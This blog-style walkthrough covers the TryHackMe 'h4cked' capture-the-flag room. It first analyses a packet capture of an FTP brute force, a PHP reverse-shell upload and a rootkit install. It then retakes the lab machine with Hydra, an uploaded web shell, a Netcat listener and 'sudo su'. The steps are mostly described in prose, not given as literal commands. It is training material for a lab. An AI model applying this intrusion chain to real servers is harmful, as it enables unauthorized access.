h4cked | TryHackMe Walkthrough
TryHackMe “h4cked”( https://tryhackme.com/room/h4cked ) is a simple CTF challenge which is a combination of blue and red teaming, where you have to analyze a network traffic capture in order to find out the activities of an adversary and hack your way back in order to gain root access because the adversary has changed some configuration.
Oh no! We’ve been hacked!
First of all fire up your pentesting machine and connect to TryHackMe network by OpenVPN. Then download the pcap file they have given. Then open it using Wireshark. Let us go on the questions one by one.
- The attacker is trying to log into a specific service. What service is this?
When analyzing the pcap file, we can easily find out that attacker is trying to log into a FTP service as there are many requests and responses from FTP, as shown below.
2. There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
By a simple Google search, we can find out that, they are asking about world famous Hydra tool.
3. The attacker is trying to log on with a specific username. What is the username?
Analyze the pcap file, adding “ftp.request” filter. You can come across that there are many USER requests for the name Jenny, as shown below.
4. What is the user’s password?
Analyze the above “ftp.request” filter further. You can see that there are many incorrect log in attempts and there is only one successful login attempt, as shown below. You can find the password there.
5. What is the current FTP working directory after the attacker logged in?
You just have to click on a packet after the attacker logged in, right click on it and “follow TCP stream”. You can find the current working directory as “/var/www/html” there because of the attacker’s execution of “PWD” command.
6. The attacker uploaded a backdoor. What is the backdoor’s filename?
You can find the filename in the above TCP stream as “shell.php”
7. The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
As given in the hint, apply filter “ftp-data” and follow TCP stream. The entire php file is visible there, and you can easily find the url when scrolling.
8. Which command did the attacker manually execute after getting a reverse shell?
You just have to select a packet after executing the shell and follow TCP stream. There you can find all the commands executed by the attacker after getting the reverse shell. Thus, “whoami” is the first manual command executed by him.
9. What is the computer’s hostname?
When looking at the above TCP stream closely, the very first lines descrbes the OS , hostname etc. As Linux is the OS, “wir3” should be the hostname.
10. Which command did the attacker execute to spawn a new TTY shell?
Anyone with the experience of reverse shells know that we are given with an unstable shell in the first place. We need to make it stable. Most of the time we use a simple Python script to do so. We can see that this attacker also uses the same script when analyzing the above TCP stream.
11. Which command was executed to gain a root shell?
When analyzing the above TCP stream, we can see that attacker has given root privileges to Jenny. Then he has gained a root shell by “sudo su”.
12. The attacker downloaded something from GitHub. What is the name of the GitHub project?
We can see a git clone done by the attacker. We can simply come across “Reptile” as the name of the GitHub project.
13. The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
So, if you don’t know what Reptile is, Google is your best friend. When Googling we can find out that it is a rootkit.
Blue teaming part is over by this point. Now we have to regain access to the system.
Hack your way back into the machine
We are informed that the attacker has changed the user’s password. So, our objective is to crack the password and gain root access in order to read the flag. Thus, first of all deploy the machine and copy the IP address.
- Run Hydra (or any similar tool) on the FTP service. The attacker might not have chosen a complex password. You might get lucky if you use a common word list.
Fire up world famous password cracking tool Hydra, in order to crack the FTP password. When using built-in wordlist “rockyou.txt” we can easily crack the FTP password within seconds.
He is not a good hacker. Isn’t it?
So, let’s login to FTP using the above credentials.
So, we are now successfully logged in as Jenny.
2. Change the necessary values inside the web shell and upload it to the webserver.
We can see the uploaded php shell of the attacker as shown below. So, I downloaded it in order to do the necessary changes.
Now you need the IP of your machine. You can view your IP configuration by giving “ifconfig” command. Remember to use the VPN(tun0) IP.
Copy the above IP and paste it in the downloaded php shell as shown below. I am using nano text editor to edit the shell. you can use whatever you prefer.
Now upload the shell to the FTP server by “put” command. When uploading the shell I came across that server has timed out. If you encounter this issue, don’t panic, just connect to FTP again.
Server timeout error
Reconnecting and uploading the shell
When giving “put” command, make sure to give the full path of shell.php file. In my case, it is located in the Home directory. So, I don’t need to give the full location.
3. Create a listener on the designated port on your attacker machine. Execute the web shell by visiting the .php file on the targeted web server.
At this point it is obvious that we need a listener in order to communicate with the shell we uploaded. So, I am establishing a Netcat listener on port 80.
Now we have to visit the web application in order to successfully execute the shell we uploaded. Visit the web application by typing the machine IP on your browser and you will be displayed with an interface like below.
Thus, in order to execute our shell, we need to give the path to the shell on the web application. Since we uploaded it into the /var/www/html directory, we just need to give “http://<machineIP>/shell.php” as the path.
As soon as the above path is given in the web application, we are provided with a reverse shell on Netcat.
As you can see, this shell is not stable. So, we can use the traditional Python script to make it more stable.
4. Become root!
As for now, I am “www-data”, which do not have root privileges. We know that Jenny has root privileges on the machine. So, let us change the user to Jenny and become root. It is so much simple as follows.
VOLA! we are given a root shell without much effort.
5. Read the flag.txt file inside the Reptile directory.
This is our objective. Isn’t it? Obtaining the flag!!!! As we are in a root shell, we can easily navigate to the Reptile directory which is in the home directory of root(/root/Reptile) and obtain the flag.
So, this is it! It was simple as that.
I would like to hear your thoughts about this too. Connect me on LinkedIn, Github.
